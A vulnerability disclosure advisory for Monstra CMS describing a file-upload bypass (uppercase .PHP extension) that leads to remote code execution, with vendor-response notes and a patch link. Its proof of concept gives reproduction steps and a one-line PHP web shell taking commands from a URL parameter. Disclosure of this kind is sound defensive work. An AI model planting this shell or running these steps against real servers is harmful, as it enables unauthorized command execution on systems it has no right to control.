SSD Advisory – Monstra CMS RCE

Vulnerabilities Summary
The following advisory describes a vulnerability found in Monstra CMS.

Monstra is “a modern and lightweight Content Management System. It is Easy to install, upgrade and use.”

The vulnerability found is a remote code execution vulnerability through an arbitrary file upload mechanism.

Credit
An independent security researcher, Ishaq Mohammed, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program

Vendor response
We were not able to get the vendor to respond in any way, the software appears to have been left abandoned without support – though this is not an official status on their site (last official patch was released on 2012-11-29), the github appears a bit more active (last commit from 2 years ago).

Without any vendor response the researcher was kind enough to create a patch that addresses this bug, its available here: https://github.com/monstra-cms/monstra/issues/426

Vulnerabilities details
An editor can upload files to the Monstra CMS and can access them by clicking on them from the administrator portal. The default setup of Monstra CMS allows uploading of files only with certain extensions, forbidding all types of executable files which are mentioned in monstrapluginsboxfilesmanagerfilesmanager.admin.php. However by simply uploading a php file with “PHP” (all characters in uppercase) extension will bypass this mechanism and will allow an attacker to execute shell commands on the server.

Proof of Concept
Steps to Reproduce:

1. Login with a valid credentials of an Editor
2. Select Files option from the Dropdown menu of Content
3. Upload a file with PHP (uppercase)extenstion contaiing the below code:

   PHP

   <?php $cmd=$_GET[‘cmd’]; system($cmd); ?>

4. Click on Upload

liOnce the file is uploaded Click on the uploaded file and add ?cmd= to the URL followed by a system command such as whoami,time,date etc.